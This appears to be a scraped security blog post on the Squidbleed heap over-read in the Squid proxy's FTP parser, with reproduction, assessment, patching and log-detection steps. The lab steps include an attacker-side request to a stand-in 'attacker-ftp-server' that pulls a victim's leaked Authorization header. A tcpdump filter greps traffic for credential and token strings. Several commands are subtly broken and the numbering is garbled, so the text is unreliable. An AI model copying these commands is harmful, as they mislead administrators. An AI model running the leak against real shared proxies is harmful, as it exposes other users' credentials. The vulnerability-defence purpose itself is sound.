Squidbleed: The 29-Year-Old Proxy Vulnerability That’s Leaking Your Credentials Right Now + Video

By /

Listen to this Post

Featured Image

Introduction:

A parser bug introduced in 1997 is still haunting the widely deployed Squid web proxy, enabling attackers with shared proxy access to leak another user’s cleartext HTTP requests—including passwords, session tokens, and API keys. Dubbed Squidbleed (CVE-2026-47729), this Heartbleed-style heap over-read vulnerability affects default Squid configurations across corporate networks, schools, and public Wi-Fi hotspots, turning trusted proxy users into potential data siphoners.

Learning Objectives:

  • Understand the technical root cause of the Squidbleed vulnerability and its 29-year journey from introduction to discovery.
  • Learn how to identify vulnerable Squid deployments and assess exposure in shared proxy environments.
  • Master practical mitigation strategies, including patching, configuration hardening, and FTP protocol disablement.
  1. Anatomy of the Squidbleed Vulnerability: How a 1997 Parser Bug Leaks Memory

The Squidbleed vulnerability resides in Squid’s FTP directory-listing parser, specifically within the code that handles legacy NetWare server responses. When processing FTP `LIST` output, Squid attempts to skip whitespace using a loop that calls strchr(w_space, copyFrom). If an attacker-controlled FTP server sends a listing line that ends abruptly after the timestamp with no filename—where `copyFrom` lands precisely on the string’s null terminator—strchr treats that terminating NUL as part of the searchable string and returns a pointer instead of NULL. The loop never terminates, walking off the end of the buffer, and `xstrdup` copies whatever follows—potentially another user’s uncleared HTTP request—back to the attacker as a “filename”.

Squid reuses freed memory buffers without zeroing them, so a 4KB buffer that recently held a victim’s HTTP request still retains most of its content. A short FTP response overwrites only the first few bytes; the over-read returns the remainder, including `Authorization` headers, session cookies, and API keys. This attack requires the attacker to control an FTP server on port 21 (enabled by default) and have trusted access to the same Squid proxy—a plausible scenario in shared environments.

Step-by-Step: Reproducing the Squidbleed Memory Leak

To understand the vulnerability, security researchers can set up a controlled lab environment:

  1. Deploy a vulnerable Squid instance (versions prior to 7.6 or 8.0) with default configuration: 
    sudo apt-get install squid=5.7-0ubuntu0.1  Example vulnerable version
sudo systemctl start squid

  2. Set up a malicious FTP server that responds with a crafted `LIST` output—a line ending immediately after the timestamp with no filename, triggering the `strchr` off-by-one.

  3. Simulate a victim sending an HTTP request through the proxy:

    curl -x http://proxy-ip:3128 -H "Authorization: Basic dXNlcjpwYXNz" http://example.com/

  4. Trigger the vulnerability from an attacker’s position by requesting a directory listing from the malicious FTP server:

    curl -x http://proxy-ip:3128 ftp://attacker-ftp-server/

  5. Observe the leaked data in the FTP response—the `xstrdup` call returns a string containing fragments of the victim’s HTTP request, including the `Authorization` header.

  6. Identifying Vulnerable Squid Deployments: Version Detection and Exposure Assessment

The vulnerability affects all Squid versions from 1997 until the patched releases (7.6 and 8.0). Organizations must inventory their Squid deployments and assess exposure. Default configurations are vulnerable, and FTP support is enabled by default.

Step-by-Step: Vulnerability Assessment Commands

1. Check Squid version:

squid -v | grep "Squid Cache: Version"

Versions below 7.6 or 8.0 are vulnerable.

  1. Verify FTP support—check if FTP is enabled in squid.conf: 
    grep -i "ftp" /etc/squid/squid.conf

    Look for `ftp_user` or `ftp_passive` directives; FTP is typically on by default.

  2. Test for the vulnerability without a full exploit—send a crafted FTP `LIST` request and monitor logs:

    tail -f /var/log/squid/access.log | grep "ftp"

    Unusual `ERR_INVALID_URL` or malformed responses may indicate the parser is mishandling input.

  3. Scan for exposed Squid proxies in your environment:

    nmap -p 3128,8080 --open --script=http-squid-version <target-1et>

  4. Review access controls—verify that only trusted clients can reach the proxy:

    grep -E "http_access|acl" /etc/squid/squid.conf

3. Mitigation Strategies: Patching, Hardening, and FTP Disablement

The most effective mitigation is upgrading to Squid version 7.6 or 8.0, which includes the fix merged in April 2026. However, many organizations run custom or distribution-specific builds; simply checking the version is insufficient—administrators must verify the presence of the guard in FtpGateway.cc.

Step-by-Step: Patching and Hardening

1. Upgrade via package manager (Ubuntu/Debian):

sudo apt-get update
sudo apt-get install squid=7.6-  Or newer
sudo systemctl restart squid
  1. For source installations, clone the patched repository and build: 
    git clone https://github.com/squid-cache/squid.git
cd squid
git checkout SQUID_7_6
./configure --prefix=/usr/local/squid
make && sudo make install

  2. Verify the fix by checking `FtpGateway.cc` for the corrected `strchr` logic:

    grep -1 "strchr" /path/to/squid/src/FtpGateway.cc

The guard should now properly handle null terminators.

4. Disable FTP entirely—the cleaner, recommended mitigation:

echo "ftp_port 0" >> /etc/squid/squid.conf
echo "acl FTP proto FTP" >> /etc/squid/squid.conf
echo "http_access deny FTP" >> /etc/squid/squid.conf
systemctl restart squid
  1. For Windows environments using Squid via Cygwin or WSL, apply the same configuration changes and verify with: 
    squid -v | findstr "Squid Cache"

  2. Forensic Detection: Identifying Squidbleed Exploitation in Your Logs

While no in-the-wild exploitation has been reported as of writing, proactive monitoring can detect suspicious FTP activity. Attackers must initiate an FTP connection through the proxy to trigger the leak; anomalous FTP requests from internal clients should raise red flags.

Step-by-Step: Log Analysis and Detection

  1. Enable detailed logging for FTP transactions in squid.conf: 
    debug_options ALL,1 9,9
access_log /var/log/squid/access.log squid

  2. Monitor for FTP `LIST` requests originating from unexpected hosts:

    grep "ftp://.LIST" /var/log/squid/access.log | awk '{print $3}' | sort | uniq -c

  3. Look for unusually long or malformed `filename` fields in FTP responses—these may indicate leaked data being returned:

    grep -E "ftp://.[A-Za-z0-9+/=]{40,}" /var/log/squid/access.log

  4. Set up a SIEM alert for FTP traffic on port 21 from internal clients that do not typically use FTP.

  5. Capture and inspect network traffic between the proxy and FTP servers:

    tcpdump -i any port 21 -A -s 0 | grep -i "authorization|cookie|token"

  6. The AI Discovery Angle: Claude Mythos and the Future of Vulnerability Research

Calif.io researchers discovered Squidbleed with the aid of Anthropic’s Claude Mythos Preview, the model behind Project Glasswing. The AI agent identified the `strchr` quirk almost instantly—the same kind of buried parser bug that AI agents have been surfacing elsewhere, including in FFmpeg. This marks a significant shift in vulnerability discovery: AI can now parse decades-old codebases and pinpoint subtle logic errors that human reviewers might overlook.

Step-by-Step: Leveraging AI for Code Auditing

  1. Feed vulnerable code snippets (e.g., the `strchr` loop) into an AI model with a prompt like: “Identify potential buffer over-read vulnerabilities in this FTP parser.”

  2. Request static analysis reports—AI can simulate execution paths and highlight off-by-one errors.

  3. Use AI to generate test cases that trigger edge conditions, such as null-terminated strings in unexpected positions.

  4. Automate regression testing—AI can compare patched vs. unpatched code to ensure the fix addresses all variants.

  5. Incorporate AI-assisted code review into CI/CD pipelines for open-source projects like Squid.

  6. The Bigger Picture: Legacy Code, Default Configurations, and Supply Chain Risk

Squidbleed is a cautionary tale about the longevity of legacy code in critical infrastructure. The bug persisted for 29 years because Squid’s FTP parser was rarely touched—FTP usage declined, and the code escaped scrutiny. Default configurations that enable unnecessary protocols (FTP, in this case) amplify risk; disabling FTP is a zero-cost mitigation that removes the attack surface entirely.

What Undercode Say:

  • Legacy code is a ticking time bomb. Code written in the 1990s, even in widely used projects, can harbor vulnerabilities that remain undetected for decades. Regular audits and fuzzing are essential.
  • Default configurations matter. Squid’s default FTP enablement turned a parser bug into a practical attack vector. Disable unused protocols in production.
  • AI is changing the game. The discovery of Squidbleed by an AI model signals a new era in vulnerability research—one where machines can outpace human reviewers in finding subtle logic flaws.
  • Patching is not enough. Verify fixes at the code level; distribution backports may vary. Confirm the guard in `FtpGateway.cc` before assuming safety.
  • Shared proxies are high-risk environments. In schools, offices, and public Wi-Fi, one malicious user can compromise the privacy of all others. Implement strict access controls and consider per-user authentication.

Analysis: The Squidbleed vulnerability highlights systemic issues in open-source maintenance: underfunded projects, reliance on volunteer contributors, and the tendency to leave “working” code untouched. The AI-assisted discovery is both a warning and an opportunity—automated tools can now find these bugs, but they also lower the barrier for attackers. Organizations must adopt a defense-in-depth strategy: disable unused protocols, enforce HTTPS (which is not vulnerable), and segment proxy users to limit the blast radius. The CVSS score of 6.5 (moderate) understates the real-world impact in shared environments, where a single leaked session token could lead to account takeover.

Prediction:

  • +1 AI-assisted vulnerability discovery will become standard practice, reducing the average time to find legacy bugs from decades to days. Expect a wave of similar findings in other long-lived projects.
  • -1 Attackers will increasingly target shared proxies and caching infrastructure, as these often lack robust authentication and are deployed in permissive configurations.
  • +1 The Squid project will likely implement stricter default configurations in future releases, disabling FTP and other legacy protocols by default.
  • -1 Organizations that delay patching or fail to disable FTP will remain exposed; the public PoC lowers the barrier for script kiddies to exploit this in shared environments.
  • +1 The use of AI in cybersecurity will accelerate both offensive and defensive capabilities, leading to an arms race that ultimately benefits well-resourced defenders.

▶️ Related Video (86% Match):

🎯Let’s Practice For Free:

🎓 Live Courses & Certifications:

Join Undercode Academy for Verified Certifications

🚀 Request a Custom Project:

Secure, high-velocity infrastructure and disruptive technological engineering. Contact our engineering team for high-tier development and proprietary systems:
[email protected]
💎 Smart Architecture | 🛡️ Secure by Design | ⭐ Trusted by Thousands

IT/Security Reporter URL:

Reported By: Mohit Hackernews – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow UndercodeTesting & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin | 🦋BlueSky

Related Posts: